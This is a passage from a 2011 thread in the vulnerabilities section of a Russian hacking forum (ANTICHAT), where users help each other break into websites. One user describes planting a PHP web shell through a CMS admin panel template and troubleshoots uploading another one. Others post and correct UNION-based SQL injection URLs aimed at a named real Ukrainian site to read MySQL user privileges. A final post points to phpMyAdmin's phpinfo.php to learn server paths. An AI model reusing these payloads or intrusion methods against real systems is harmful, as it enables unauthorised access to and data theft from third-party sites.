HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16591  
Старый 12.03.2011, 12:55
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию

да я это видел но нигде нету конкретного примера
 
Ответить с цитированием

  #16592  
Старый 12.03.2011, 12:57
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от rootmd  
rootmd said:
да я это видел но нигде нету конкретного примера
а никто тебе конкретно не даст...а приват палить никто не будет (если он есть)..
 
Ответить с цитированием

  #16593  
Старый 12.03.2011, 13:01
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию

Вот нашел, в метасплойт есть, попробуем! )
 
Ответить с цитированием

  #16594  
Старый 12.03.2011, 18:11
[R]eD
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171

Репутация: 3
По умолчанию

Залил шелл через админку кмс (засунул шелл в шаблон)

захожу на него все ок - шелл полностью работает.

дальше заливаю шелл отдельно от шаблона, файл залился

НО, при заходе на него вылазит ошибка 500 ( Premature end of script headers: в error.log ) и так на все новые залитые .php файлы, если залить .txt все ок (пробывал чтобы пхп обрабатывал тхт как скрипт, проблема остается). Пробывал менять chmod (0777/0755/0700) результата 0.

т.е. править скрипты можно, но заливать скрипты чтобы они выполнялись нет.

дело явно не в содержании шелла, если вписать 123 и назвать файл asd.php он всеравно выдаст ошибку.

все остальные файлы в директории (которые были до меня) выполняются отлично, если отредактировать один из такхи файлов то тоже все работает, но нужно именно залить отдельно шелл.

safe mode выключен, все папки открыты на запись, вобщем свиду все нормально...

система freebsd

помогите, не знаю что и думать
 
Ответить с цитированием

  #16595  
Старый 12.03.2011, 18:24
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от [R  
eD"]
[R]eD said:
Залил шелл через админку кмс (засунул шелл в шаблон)
захожу на него все ок - шелл полностью работает.
дальше заливаю шелл отдельно от шаблона, файл залился
НО, при заходе на него вылазит ошибка 500 ( Premature end of script headers: в error.log ) и так на все новые залитые .php файлы, если залить .txt все ок (пробывал чтобы пхп обрабатывал тхт как скрипт, проблема остается). Пробывал менять chmod (0777/0755/0700) результата 0.
т.е. править скрипты можно, но заливать скрипты чтобы они выполнялись нет.
дело явно не в содержании шелла, если вписать 123 и назвать файл asd.php он всеравно выдаст ошибку.
все остальные файлы в директории (которые были до меня) выполняются отлично, если отредактировать один из такхи файлов то тоже все работает, но нужно именно залить отдельно шелл.
safe mode выключен, все папки открыты на запись, вобщем свиду все нормально...
система freebsd
помогите, не знаю что и думать
.htaccess
 
Ответить с цитированием

  #16596  
Старый 12.03.2011, 18:34
[R]eD
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171

Репутация: 3
По умолчанию

В .htaccess ничего нету кроме AddDeafultCharset UTF-8

// мда.. сломал сайт вобщем, подожду пока админы поправят чтобы еще попробывать что-нибудь...
 
Ответить с цитированием

  #16597  
Старый 12.03.2011, 21:48
asql
Guest
Сообщений: n/a
Провел на форуме:
8829

Репутация: -3
По умолчанию

подскажите, как вывести file_priv?

пробую

http://www.newhorizons.com.ua/news_detail.php?id=-100+union+select+1,2,file_priv,4,5,6,7,8+from+mysq l.user+where+user=0x755f6e6577686f72697a6f6e--

никак не получаетса
 
Ответить с цитированием

  #16598  
Старый 12.03.2011, 22:07
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

с чего ты решил что у тебя доступ к ней?

http://www.newhorizons.com.ua/news_detail.php?id=-100+union+select+1,2,3,4,5,6,7,8+from+mysql.user--+
 
Ответить с цитированием

  #16599  
Старый 12.03.2011, 23:48
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию

как узнать полный путь от сервера к сайту ? есть доступ к pma
 
Ответить с цитированием

  #16600  
Старый 12.03.2011, 23:54
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от foozzi  
foozzi said:
как узнать полный путь от сервера к сайту ? есть доступ к pma
почти всегда есть файл phpinfo.php в корневой директории пма (если админ не удалил,то оно там лежит по дефолту)

http://site.com/phpmyadmin/phpinfo.php
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ